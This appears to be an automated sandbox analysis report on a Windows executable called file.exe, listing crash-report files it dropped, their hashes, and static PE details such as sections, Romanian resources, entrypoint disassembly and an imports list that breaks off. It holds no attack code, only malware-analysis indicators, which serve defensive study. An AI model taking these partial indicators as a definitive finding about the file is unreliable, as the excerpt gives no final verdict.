Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.1.1.3.6.8.6.5.6.6.4.1.5.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.1.3.1.0.7.2.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.9.3.7.1.9.7.c.-.8.d.4.c.-.4.a.9.e.-.9.e.0.b.-.3.5.a.e.5.b.0.d.1.7.7.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.a.4.3.b.b.f.c.-.1.3.8.c.-.4.2.5.7.-.8.e.c.2.-.f.f.8.3.d.6.b.9.a.7.3.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.6.0.-.0.0.0.1.-.0.0.1.4.-.e.f.d.1.-.1.1.0.e.5.6.9.3.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.a.8.4.5.2.c.e.3.e.f.7.3.0.5.5.2.d.9.8.1.1.8.7.1.8.1.d.5.4.2.b.0.0.0.0.0.a.1.6.!.0.0.0.0.f.0.7.9.3.f.1.b.0.0.4.e.b.6.0.f.5.1.c.2.1.d.c.d.a.a.d.e.6.d.f.8.6.c.1.4.1.9.d.b.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.4././.1.8.:.1.2.:.5.9.:.4.2.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_f26ec913b0e96e6b4e4a1fab19facc1930b3e25_79a0e859_42dc5897-5fe7-48b0-9f37-20795f382a3b\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9940038667983384
Encrypted:	false
SSDEEP:	192:1v739Uv2P7AQ04DmIwsyI3jldFPzuiFoZ24IO8kVB:p02jAr4Dm9sRjlzuiFoY4IO8a
MD5:	A6E766741089385BA870F56AAA2C4FDF
SHA1:	4490A158F27337096CB43244098F182A27EDE6CA
SHA-256:	A9CAA7710CD6A53DCF18F4B361B8877B452C0C9EA56E7CF5C2C986BA9A799557
SHA-512:	D7915078D208FF5D9179D102523107DEEDD7A5B9BED2BA2ACA07314A038E70981EB0D791952ED7D95D2DCE940F1609D9408E29F492F2A3D9C5F26DF8213E77C0
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.1.1.3.6.8.7.3.2.0.5.1.8.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.1.1.3.6.8.8.6.0.1.7.6.8.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.2.d.c.5.8.9.7.-.5.f.e.7.-.4.8.b.0.-.9.f.3.7.-.2.0.7.9.5.f.3.8.2.a.3.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.0.2.3.4.7.a.2.-.f.a.3.b.-.4.c.6.f.-.9.c.1.1.-.8.3.8.f.a.0.0.3.7.6.4.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.6.0.-.0.0.0.1.-.0.0.1.4.-.e.f.d.1.-.1.1.0.e.5.6.9.3.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.a.8.4.5.2.c.e.3.e.f.7.3.0.5.5.2.d.9.8.1.1.8.7.1.8.1.d.5.4.2.b.0.0.0.0.0.a.1.6.!.0.0.0.0.f.0.7.9.3.f.1.b.0.0.4.e.b.6.0.f.5.1.c.2.1.d.c.d.a.a.d.e.6.d.f.8.6.c.1.4.1.9.d.b.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.4././.1.8.:.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE01F.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Sat Apr 20 19:08:06 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	53810
Entropy (8bit):	2.646647227419799
Encrypted:	false
SSDEEP:	192:Rf8nuwXv1MIctObBTNwrQnNAZRZasksMT3WJ5TxxvsEFr:58b1MI7bBB2QnNAZRnMbWJZxxvsi
MD5:	97A4ECC975199E051FBD1BF5AED9515D
SHA1:	83254B3289B2A0A00156008EC2E987C65552877F
SHA-256:	BDA55903EF4DB612A5636EA90A604F8AC90EB63B6E9B46943DC2C606A2277B13
SHA-512:	53260669222DE8D59DD8E411C4ADE21E4F8FEF7E5AE054EA91C75C0040CFFA21EE5836E884D851629C072A8ACB73C09BB11D8CDCBC5D8BAEBDBE285224C8F15B
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .........$f............4...............H.......t...........t...N1..........`.......8...........T...........x=..............` ..........L"..............................................................................eJ......."......GenuineIntel............T.......`.....$f.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE10A.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8372
Entropy (8bit):	3.687403978658031
Encrypted:	false
SSDEEP:	192:R6l7wVeJ6CH6IpK6Y9rvSUPmgmf6B6CpN189bua1fiW6m:R6lXJp6IE6YBSUPmgmf5Luwfiy
MD5:	F58BBD5B86AB6DE491705736F460F282
SHA1:	85C183E4C5CA54499AB6EDD34B1CD62258649C30
SHA-256:	4F6D23034F2EA4104E2B5A090ACB02908D012DE530BF7E3ED52A943ED9CF0F26
SHA-512:	C4E91B2876754202C67A6229EFFCF395821E092834F7C0BB14A8DA070B4EB8C7A07E74200C5556B000BA635B37274C5976F36FDFE4F4A3931EDD08AE22AB3343
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.1.9.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE12B.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4642
Entropy (8bit):	4.415924460228549
Encrypted:	false
SSDEEP:	48:cvIwWl8zsLJg77aI9CdWpW8VYHDYm8M4JiNFCFvr+q8vjNFiyjuamZ0vd:uIjflI7Is7V/JirgKjriyvmZ0vd
MD5:	47157BF8CB10D99D5A63383FC6D506AF
SHA1:	5E205B97B1FB71871AE27EB180B7F6D922CC3A2E
SHA-256:	42233DB8CEB88E0358EA9E782FDCA416F22FE083CE3182D42D355A24B7673807
SHA-512:	49C8A10E5946D5AB322300316E69DBFCDF2AB4D48C4A28854275F599452B578FF41BCB91494BF7CDF9C309B497C8233CC6C0BD9AFCF785FCE8AAB1AB5D2AA1E6
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="288610" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE30D.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Sat Apr 20 19:08:07 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	1085162
Entropy (8bit):	1.0663006987599164
Encrypted:	false
SSDEEP:	3072:c7T2n4tPGmTebUHoz8IlAH7EHc7PTyXo/5HXhHxd2k:c/tPacoz8IlAH7Ac/yXihHfr
MD5:	D64FF6DB72B29FB6ECEBBD1FA6340E82
SHA1:	29F71853EDF1B400C6E527C36D4F37FA4A39E1DA
SHA-256:	618DE5D5AB8F55E5F097D1537F714069526E095857EE48F6D8D857F15C076268
SHA-512:	C95DDC3565552259E2137EFEB03427A4C730F9310A0AE1E61D0628CDF3DAB53BDB7D787D49B1B5EB767E2F8E0D11D7581CF3A167197F460F9B9C0B87501DB382
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .........$f............4...............H.......t...........d...N1..........`.......8...........T...........P=...Q..........` ..........L"..............................................................................eJ......."......GenuineIntel............T.......`.....$f.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE773.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8414
Entropy (8bit):	3.6949518344781525
Encrypted:	false
SSDEEP:	192:R6l7wVeJ6Cv6IWF6Y9MSUPJgmf6gz6cIxpDa89bgKsfzgm:R6lXJR6IU6Y2SUPJgmfpz6cSgpfx
MD5:	AB588C28ACC923B41352280D63340EC1
SHA1:	85F44424F13D6918626513CAB3BE1FAFB5C0F4A8
SHA-256:	879DC327297F273FE17B817945B7147FB3FB41A706BB800AEFACE12969728901
SHA-512:	97DE3740E815D6EAAB022C99C9BC70B854E357A9A18021E8742771AA17A005C50A06288F41295E45F719CC6ECCF3A6C9E0B1E7736A90E1FCE0A21038F038FFF8
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.1.9.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE793.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4696
Entropy (8bit):	4.455507687282217
Encrypted:	false
SSDEEP:	48:cvIwWl8zsLJg77aI9CdWpW8VYHHYm8M4JiNOrQO3Fx+q8vjNOrQONyjuamZ0ed:uIjflI7Is7VDJiGQsKjGQwyvmZ0ed
MD5:	BD56D4C6CC705090763CBBEE3531CD79
SHA1:	1EF7889A593622D3E8A6D2D85D45C745B34D3E33
SHA-256:	C5E816991B8AC5644AF787DE0BDBEABEBB7430FA9171C473DA18FB951E643285
SHA-512:	4C116D120DD1CC04C0325D16F5902288B8E2EE28E6B342B33432B37385CF6CC9EC1B7E386C5729BB331DC30663642982DE990CC91EED517F56BE0CD0332ADDA5
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="288610" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465260140383948
Encrypted:	false
SSDEEP:	6144:jIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNPdwBCswSb6:0XD94+WlLZMM6YFH1+6
MD5:	18AA32B24DB057A15E3D60A1874DE1B8
SHA1:	69CBA63DECA2A0984956FD933C26ECEA9644C1DD
SHA-256:	B5189BABC1AD2C465003A973B17D9273CCC990311810327BF1169462EE39CD63
SHA-512:	232218D050853B19AA69417E334063586A765EA1B5493A4F8A414581319393E80A8DD5422EF1E75D657102682178807ACC0C355415465C652278A5291A475933
Malicious:	false
Reputation:	low
Preview:	regf7...7....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmJ...V..................................................................................................................................................................................................................................................................................................................................................'........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.848879786235133
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	406'528 bytes
MD5:	b09198b2d83af5e3d6c58d710d4192e0
SHA1:	f0793f1b004eb60f51c21dcdaade6df86c1419db
SHA256:	80f337e35d324639f217f8b36c13d906ab3c8aa4917c0ba1a7b09f52ae3c9a0c
SHA512:	c1ea5294bea8485c95ce39b2f9c14d067418fe1c1cb4b3379eb07b716ab7031702d111f053a70d7f6895cc69e44070dd298c088ecb223c11e9a83323200a8683
SSDEEP:	6144:i3BIWSBLGNjbvUXu2XzAILZorU0qBflEFReLzsAz:WBIWxHUPXsILYUbzEFoz1
TLSH:	AF848C0372E1BC64E52257329F6E9AEC772DF8614E24BB1722C9AE2F18711B1F217711
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................W.......h.Q.....i.....................e-m.......S.....e-V.....Rich....................PE..L....7.c...........

File Icon


Icon Hash:	492145454d4d410d

Static PE Info

General

Entrypoint:	0x403d77
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x638337B0 [Sun Nov 27 10:10:56 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	deee2f3ec985195fc99175dfed532c7c

Entrypoint Preview

Instruction
call 00007F614C83D268h
jmp 00007F614C835E35h
push 00000014h
push 004177E0h
call 00007F614C83A458h
call 00007F614C83D439h
movzx esi, ax
push 00000002h
call 00007F614C83D1FBh
pop ecx
mov eax, 00005A4Dh
cmp word ptr [00400000h], ax
je 00007F614C835E36h
xor ebx, ebx
jmp 00007F614C835E65h
mov eax, dword ptr [0040003Ch]
cmp dword ptr [eax+00400000h], 00004550h
jne 00007F614C835E1Dh
mov ecx, 0000010Bh
cmp word ptr [eax+00400018h], cx
jne 00007F614C835E0Fh
xor ebx, ebx
cmp dword ptr [eax+00400074h], 0Eh
jbe 00007F614C835E3Bh
cmp dword ptr [eax+004000E8h], ebx
setne bl
mov dword ptr [ebp-1Ch], ebx
call 00007F614C839C4Eh
test eax, eax
jne 00007F614C835E3Ah
push 0000001Ch
call 00007F614C835F11h
pop ecx
call 00007F614C839410h
test eax, eax
jne 00007F614C835E3Ah
push 00000010h
call 00007F614C835F00h
pop ecx
call 00007F614C83D274h
and dword ptr [ebp-04h], 00000000h
call 00007F614C83C2EDh
test eax, eax
jns 00007F614C835E3Ah
push 0000001Bh
call 00007F614C835EE6h
pop ecx
call dword ptr [004110C8h]
mov dword ptr [01A14DC0h], eax
call 00007F614C83D28Fh
mov dword ptr [0044CD0Ch], eax
call 00007F614C83CC32h
test eax, eax
jns 00007F614C835E3Ah

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[IMP] VS2008 SP1 build 30729
[RES] VS2013 build 21005
[LNK] VS2013 UPD5 build 40629

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x17c34	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1615000	0x17c00	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x11210	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x17178	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x11000	0x19c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xfec5	0x10000	3d2d186f6d017cba5b080eafc75e6efb	False	0.6039276123046875	data	6.707537332987908	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x11000	0x75c0	0x7600	5857b641fabf618205667d2eeb322088	False	0.3945643538135593	data	4.9461038847232155	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x19000	0x15fbdc4	0x33e00	76814f03fbc49d5d35791390cd25443d	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x1615000	0x17c00	0x17c00	17b5ad698c69d82780624f64ffeefd78	False	0.31922286184210524	data	4.14158676530856	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x1627ae0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.26439232409381663
RT_CURSOR	0x1628988	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.3686823104693141
RT_CURSOR	0x1629230	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.49060693641618497
RT_CURSOR	0x16297c8	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.4375
RT_CURSOR	0x16298f8	0xb0	Device independent bitmap graphic, 16 x 32 x 1, image size 0			0.44886363636363635
RT_CURSOR	0x16299d0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.27238805970149255
RT_CURSOR	0x162a878	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.375
RT_CURSOR	0x162b120	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.5057803468208093
RT_ICON	0x16158d0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Romanian	Romania	0.41359447004608296
RT_ICON	0x1615f98	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Romanian	Romania	0.16524896265560166
RT_ICON	0x1618540	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Romanian	Romania	0.2154255319148936
RT_ICON	0x16189d8	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Romanian	Romania	0.41359447004608296
RT_ICON	0x16190a0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Romanian	Romania	0.16524896265560166
RT_ICON	0x161b648	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Romanian	Romania	0.2154255319148936
RT_ICON	0x161bae0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Romanian	Romania	0.37100213219616207
RT_ICON	0x161c988	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Romanian	Romania	0.45306859205776173
RT_ICON	0x161d230	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Romanian	Romania	0.4619815668202765
RT_ICON	0x161d8f8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Romanian	Romania	0.45664739884393063
RT_ICON	0x161de60	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Romanian	Romania	0.2691908713692946
RT_ICON	0x1620408	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Romanian	Romania	0.3062851782363977
RT_ICON	0x16214b0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Romanian	Romania	0.350177304964539
RT_ICON	0x1621980	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Romanian	Romania	0.5679637526652452
RT_ICON	0x1622828	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Romanian	Romania	0.546028880866426
RT_ICON	0x16230d0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Romanian	Romania	0.6184971098265896
RT_ICON	0x1623638	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Romanian	Romania	0.4650414937759336
RT_ICON	0x1625be0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Romanian	Romania	0.48686679174484054
RT_ICON	0x1626c88	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Romanian	Romania	0.49426229508196723
RT_ICON	0x1627610	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Romanian	Romania	0.44769503546099293
RT_DIALOG	0x162b8a8	0x52	data			0.8780487804878049
RT_STRING	0x162b900	0x3d2	data	Romanian	Romania	0.4539877300613497
RT_STRING	0x162bcd8	0x32a	data	Romanian	Romania	0.47901234567901235
RT_STRING	0x162c008	0x1a8	data	Romanian	Romania	0.49528301886792453
RT_STRING	0x162c1b0	0x30a	data	Romanian	Romania	0.47429305912596403
RT_STRING	0x162c4c0	0x534	data	Romanian	Romania	0.44744744744744747
RT_STRING	0x162c9f8	0x208	data	Romanian	Romania	0.5038461538461538
RT_GROUP_CURSOR	0x1629798	0x30	data			0.9375
RT_GROUP_CURSOR	0x16299a8	0x22	data			1.0588235294117647
RT_GROUP_CURSOR	0x162b688	0x30	data			0.9375
RT_GROUP_ICON	0x1627a78	0x68	data	Romanian	Romania	0.7115384615384616
RT_GROUP_ICON	0x16189a8	0x30	data	Romanian	Romania	0.9375
RT_GROUP_ICON	0x1621918	0x68	data	Romanian	Romania	0.7115384615384616
RT_GROUP_ICON	0x161bab0	0x30	data	Romanian	Romania	1.0
RT_VERSION	0x162b6b8	0x1ec	data			0.5386178861788617

Imports

DLL	Import
KERNEL32.dll	LocalCompact, GetUserDefaultLCID, AddConsoleAliasW, CreateHardLinkA, GetTickCount, GetWindowsDirectoryA, EnumTimeFormatsW, FindResourceExA, GetVolumeInformationA, LoadLibraryW, ReadConsoleInputA, CopyFileW, WriteConsoleW, GetCompressedFileSizeA, GetTempPathW, SetThreadLocale, GetLastError, SetLastError, GetProcAddress, GetLocaleInfoA, CreateTimerQueueTimer, SetStdHandle, SetFileAttributesA, WriteConsoleA, InterlockedExchangeAdd, LocalAlloc, SetCalendarInfoW, GetExitCodeThread, RemoveDirectoryW, AddAtomA, GlobalFindAtomW, GetModuleFileNameA, GetOEMCP, GlobalUnWire, LoadLibraryExA, AddConsoleAliasA, OutputDebugStringW, GetComputerNameA, FindFirstChangeNotificationW, GetSystemDefaultLangID, FlushFileBuffers, GetConsoleMode, HeapFree, EncodePointer, DecodePointer, IsProcessorFeaturePresent, GetCommandLineA, RaiseException, RtlUnwind, IsValidCodePage, GetACP, GetCPInfo, GetCurrentThreadId, IsDebuggerPresent, GetProcessHeap, ExitProcess, GetModuleHandleExW, MultiByteToWideChar, WideCharToMultiByte, HeapSize, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, GetFileType, DeleteCriticalSection, GetStartupInfoW, CloseHandle, HeapAlloc, WriteFile, GetModuleFileNameW, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, 